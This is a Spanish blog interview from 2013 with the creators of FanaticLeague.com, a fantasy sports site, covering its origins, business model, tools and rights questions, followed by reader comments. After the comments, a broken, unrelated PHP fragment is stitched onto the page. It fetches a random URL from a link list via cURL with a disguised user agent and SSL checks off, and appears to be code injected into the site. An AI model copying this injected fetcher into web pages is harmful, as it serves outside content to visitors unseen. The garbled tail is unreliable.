FanaticLeague.com, fantasy leagues made in Spain

29 de April de 2013 por Gallis

Nos encanta la NBA. Nos encanta hasta el punto de incluso perder algo de salud, quedándonos hasta horas intempestivas, no ya para ver a nuestro equipo, sino que en muchas ocasiones, lo hacemos solo para ver en acción a jugadores que nos dejan con la boca abierta. Pero seamos sinceros, cuando además, la actuación de ese jugador nos “ayuda” a ganar algún partido en una liga virtual, la alegría es, como mínimo, doble. Todos jugamos en mayor o menor medida en alguna liga así, que hace que vibremos con partidos que de otra manera no despertarían en nosotros ningún interés, o que nada más levantarnos, acudamos a ver los Box Scores de la pasada noche como si nos fuera la vida en ello. Nos encanta ser el mánager de un equipo, pensar cual es el mejor traspaso para conseguir el base que necesitamos, intentar hallar el mejor robo en el próximo draft,.. Y a muchos de nosotros, no solo nos pasa con la NBA… Ligas de fútbol, ACB, NFL, etc, etc… Las posibilidades son casi ilimitadas. Hoy nos permitimos la licencia de presentaros una de esas páginas que ofrecen la posibilidad de que disfrutemos con juegos como estos. fanaticleague.com… Un proyecto nuevo, interesante, made in Spain, que esperemos que os guste.

Empecemos por el principio ¿Qué es FanaticLeague.com?

FanaticLeague es un juego online de deportes tipo fantasy manager. En él, los usuarios, pueden crear ligas para competir contra sus amigos o unirse a las ligas públicas creadas por otros usuarios. En este juego los amantes del deporte pueden encontrar un sitio donde divertirse, ya que podrán jugar en ligas de fútbol, baloncesto, Fórmula 1 y MotoGP, por el momento. Además de estos deportes contamos con diversas competiciones, como la Liga BBVA, la PremierLeague, la Bundesliga, la Champions League o las ligas Endesa ACB o la NBA. La próxima temporada también incluiremos una nueva competición baloncestística, la Euroleague.

¿Cómo surge la idea? ¿Cuáles son sus orígenes?

Somos cinco amigos entusiastas de los juegos y el deporte, y no encontrábamos ningún juego que cubriera nuestras expectativas de lo que pensábamos que debería ser un juego deportivo online completo. Algunas veces, en nuestras conversaciones, hablábamos de las características que debería tener este juego ideal y así empezó a nacer la idea de FanaticLeague, de eso hace ya mucho tiempo. A pesar de tener la idea en la cabeza no la empezamos a desarrollar porque estábamos enfrascados en otros proyectos. Hace casi dos años decidimos reemprender la idea que teníamos en mente y creamos nuestra propia empresa, CodeSfera SL, desde donde hemos forjado FanaticLeague.com.

Por lo que podemos decir que el origen de FanaticLeague no es más que la plasmación del juego deportivo online que considerábamos que debería ser el “ideal”. Para crearlo aprovechamos la experiencia de uno de nosotros en el desarrollo de deportes online, porque anteriormente ya había creado un manager online de básquet por su cuenta. Esta experiencia previa nos ha servido como una buena guía para saber los pasos que deberíamos dar.

¿Ha sido muy difícil poner en marcha la empresa, la página, el proyecto,…?

Cuando decidimos empezar con la empresa sabíamos que sería muy complicado, no nos encontramos en la mejor situación socioeconómica para hacerlo, pero creíamos en nosotros y en nuestro proyecto. Desde el primer día hemos estado trabajando mucho, pasando muchas horas trabajando delante de los ordenadores para levantar la empresa y desarrollar FanaticLeague. Sin duda alguna el mayor problema con el que nos hemos encontrado ha sido a la hora de trabajar en el diseño de la web, ya que ese no es nuestro fuerte. A pesar de ello estamos muy orgullosos de cómo ha quedado.

Aunque estamos muy contentos del estado actual del juego, tanto estético como de funcionalidades, sabemos que un juego online no puede quedar estancado, tiene que ir evolucionando, prácticamente, día a día, y eso es otro toro de batalla. Siempre estamos pensando aspectos que mejorar, funcionalidades a implementar, intentar mejorar la programación… y eso por no hablar de cuando nos surge algún fallo. Sin duda FanaticLeague nos ocupa muchas horas al día y nos roba horas de vida social, ya que tenemos que estar casi 24 horas al día pendientes de dar lo mejor a los usuarios. Otro de los quebraderos de cabeza con el que nos hemos encontrado ha sido a la hora saber el uso que podíamos hacer de algunos contenidos, hasta donde podíamos llegar y lo que podíamos hacer. Está siendo difícil, aunque nos sentimos afortunados porque hemos logrado crear, y asentar, nuestra propia empresa y estamos trabajando en lo que más nos gusta.

¿Qué ofrece FanaticLeague.com que no ofrezcan otras páginas de juegos online?

Como hemos dicho anteriormente, no encontrábamos ningún juego que cubriese nuestras expectativas, ya que todos se dedican a un solo deporte (fútbol, baloncesto…) y nosotros queríamos poder jugar a varios deportes a la vez. Así que en FanaticLeague hemos unido diferentes deportes y competiciones en una única página y con un mismo usuario. Otra de las diferencias que ofrece FanaticLeague es la opción de configurar las ligas al gusto de los usuarios. Cada administrador puede modificar el número máximo de usuarios en la liga, que sea una liga privada o pública, el máximo de jugadores por equipo, que valores computan en la puntuación, el tipo de mercado, los premios por punto y jornada otorgados, entre otros valores. Las puntuaciones logradas por los jugadores se obtienen, únicamente, de las estadísticas de los partidos, siendo así un sistema de puntuación totalmente transparente y objetivo. También hemos considerado oportuno acercar las redes sociales al juego, existiendo la posibilidad de seguir los tweets que publiquen los jugadores desde la misma página.

En principio, la inscripción es gratuita… ¿Cuál es el modelo de negocio?

Efectivamente, la inscripción es totalmente gratuita y un usuario puede jugar tranquilamente sin necesidad de poner un solo euro. Nuestro modelo de negocio se basa en el freemium, o también llamado free2play. Esto implica que los usuarios que lo desean puedan adquirir los paquetes premium, llamados FAN+ en el juego, los cuales les aportarán nuevas y mejores experiencias dentro del juego, tales como más tácticas, acceso a más información y más estadísticas… Estos usuarios podrán gozar de un juego mucho más amplio y atractivo.

¿Qué tecnologías y herramientas utilizáis para su desarrollo?

El juego se ha creado mediante entorno de desarrollo Microsoft con bases de datos MySQL, Visual Studio como entorno IDE de programación y Notepad++. El blog, el foro y la wiki se han desarrollado con módulos PHP en servidores Linux. Actualmente estamos trabajando en el desarrollo de una API de contenidos para que cualquiera pueda crear sus propias páginas con información de FanaticLeague, y, en base a la cual, está el futuro de la arquitectura de FanaticLeague y de todos los dispositivos desde los cuales poder acceder.

¿Qué importancia juegan las redes sociales en el desarrollo futuro de la web?

Muchísima. Estamos intentando mejorar este aspecto del juego, pero nos está siendo bastante difícil por la falta de tiempo y de recursos. Ojalá logremos mejorar el desarrollo de las redes sociales pronto, ya que será la base de la futura evolución del juego. A pesar de ello, en la web ya se puede compartir mucha información con las redes sociales.

Al ser una web de deportes tanto nacionales como internacionales… ¿qué expectativas tenéis de entrar en mercados internacionales?

Cuando abrimos el juego ya lo hicimos con competiciones internacionales. Desde el primer momento en que empezamos a desarrollar la idea de FanaticLeague trabajamos para que nos fuera útil cara a diferentes deportes, incluso para el fútbol hindú con elefantes. En España, quizás, no tendría éxito, pero en la India… Ahora en serio, queremos que FanaticLeague sea un juego global, tenemos la intención de expandir este modelo a otros mercados, con sus respectivos deportes y competiciones más importantes. A nivel informático ya está todo perfectamente planteado para que esto se pueda hacer, sin embargo a nivel comercial nos falta mucho.

¿Qué cifra de usuarios consideraríais un éxito tener a finales de 2013?

Consideramos que una cifra muy buena, contando con las competiciones actuales y las que pueden venir en el futuro próximo, sería entre 15.000 y 20.000 usuarios. De estos esperamos que sobre un 8-10% fueran Premium. Son números ambiciosos, pero creemos que podríamos llegar a ellos.

Tjnba.com es un blog de gente interesada en la NBA, así que vamos con unas preguntas relacionadas con la mejor liga de baloncesto del mundo… ¿Cómo se juega a la NBA en la FanaticLeague.com?

El sistema de juego de la NBA es idéntico al de las otras ligas, con la excepción de las ligas de Fórmula1. Cada usuario se une a una liga y recibe una plantilla aleatoria y un saldo económico, si no se ha modificado la opción por defecto en la configuración de la liga en cuestión. A partir de allí se puede fichar y vender jugadores para lograr la mejor plantilla, teniendo en cuenta que todos los jugadores de la NBA están disponibles y son únicos, es decir que Lebron James solo lo puede tener un equipo en esa liga. En cada jornada, entendiendo jornada NBA como día natural, cada equipo tiene que confeccionar la mejor alineación posible, con quinteto titular y suplente, para lograr el mayor número posible de puntos. El gran reto de las ligas NBA es lograr un plantilla completa, con el máximo de jugadores posibles y que puedas ir haciendo rotaciones para que cada día tengas muchas posiciones cubiertas con jugadores que jugarán esa noche, ya que en la NBA puedes encontrarte con un jugador que esté tres o cuatro días sin jugar. Poco a poco te vas enganchando y picando con tus rivales.

¿Por cierto, os habéis puesto en contacto de alguna manera con la NBA, para establecer algún tipo de sinergia con ellos?

¿Y ellos con nosotros? (Risas) Hablando ya en serio, nos encantaría que, solamente, nos contestasen al teléfono. Aún somos un juego muy pequeño para poder empezar a negociar con estas grandes empresas y ligas. Vamos dando pasos pequeños y seguros, primero queremos afianzarnos dentro del sector como una buena opción, ese es nuestro actual objetivo primordial. Aunque ideas de colaboración con los grandes organismos surgen constantemente en la oficina, nos encantaría poder ofrecer regalos y sistemas de fidelización para nuestros usuarios, integrar partidos en directo para nuestros usuarios Premium, añadir feedsde noticias y estadísticas, etc. Ideas tenemos para colaborar con ellos, pero primer necesitamos hacernos más grandes y visibles.

¿Os proporcionan ellos las estadísticas o disponéis de algún otro servicio?

A día de hoy disponemos de un panel de administración en el que algunos usuarios nos insertan las estadísticas de algunos partidos y nosotros, posteriormente, las revisamos. Sin embargo las estadísticas de muchos partidos somos nosotros mismos los que, manualmente, las vamos introduciendo en el sistema. En este aspecto es muy importante la usabilidad del panel de administración, actualmente tardamos unos cinco minutos en incluir todas las estadísticas de cada partido. Echad cuentas de los partidos que hay cada día y veremos el tiempo que destinamos a ello. Con la acumulación de las competiciones del fin de semana los lunes se hacen eternos.

Respecto a los servicios con los que contamos, ahora mismo no tenemos ninguno. Sabemos que con alguno de los existentes con un solo clic lo tendríamos hecho, pero son servicios con un coste demasiado elevado para nosotros en estos momentos. Quizás la próxima temporada haya soluciones más viables en este sentido.

¿Habéis tenido algún problema de derechos, a la hora de usar nombres o imágenes de la NBA?

Hasta el día de hoy no. Este tema siempre nos ha preocupado mucho, ya hace tiempo nos lo preguntaron en otro medio. Cuando empezamos a trabajar seriamente en el proyecto nos pusimos en contacto con distintos asesores legales, sobretodo especializados en derecho y propiedad intelectual, porque es un tema que debe preocupar a cualquier página web que quiera publicar este tipo de contenidos. Siempre nos hemos ajustado a la recomendaciones que nos indicaron, y ante cualquier duda que nos surja les volvemos a llamar para que nos asesoren. Aunque creemos que hacemos las cosas correctamente, no tendríamos ningún problema en eliminar una imagen o cambiar un logotipo si alguien siente que perjudicamos su marca. Nos encantaría que un día sonara el teléfono y al otro lado estuviese alguien de la NBA, como habíamos dicho antes. Pero no sólo de la NBA, de todas las ligas con las que trabajamos en el juego. Por ejemplo, antes incluso de empezar el juego de la Liga BBVA enviamos un correo electrónico a la RFEF y no obtuvimos respuesta alguna. Por ahora para ellos es como si no existiéramos, esperemos que en poco tiempo ya nos conozcan.


De momento, sois vosotros quienes ya los conocéis. Ahora depende de vosotros probar suerte.

Comenta

6 comentarios a esta entrada

  1. Denise dice:
    #1

    Gran información Gallis. Suena cojonudo.

      Citar

  2. José Miguel Guasch dice:
    #2

    Muchas gracias por la entrevista, esperamos que tenga buena acogida! Mucha suerte a vosotros también! 🙂

      Citar

  3. MagicJohnson32 dice:
    #3

    José Miguel Guasch:
    Muchas gracias por la entrevista, esperamos que tenga buena acogida! Mucha suerte a vosotros también! :)

    Tengo una pregunta. ¿Se pueden crear ligas privadas? Hablo de las de NBA, claro. Lo suyo sería crear una liga TJ para la próxima temporada 😉

      Citar

  4. M dice:
    #4

    Mola 🙂

      Citar

  5. José Miguel Guasch dice:
    #5

    Por supuesto! Simplemente, hay que poner una contraseña y enviar las invitaciones a tus amigos. Gracias!

      Citar

  6. Meta World Peace dice:
    #6

    buena entrevista y gran juego el fanaticleague, me encanta lo de las caritas tristes para que los jugadores no se apalanquen en un equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>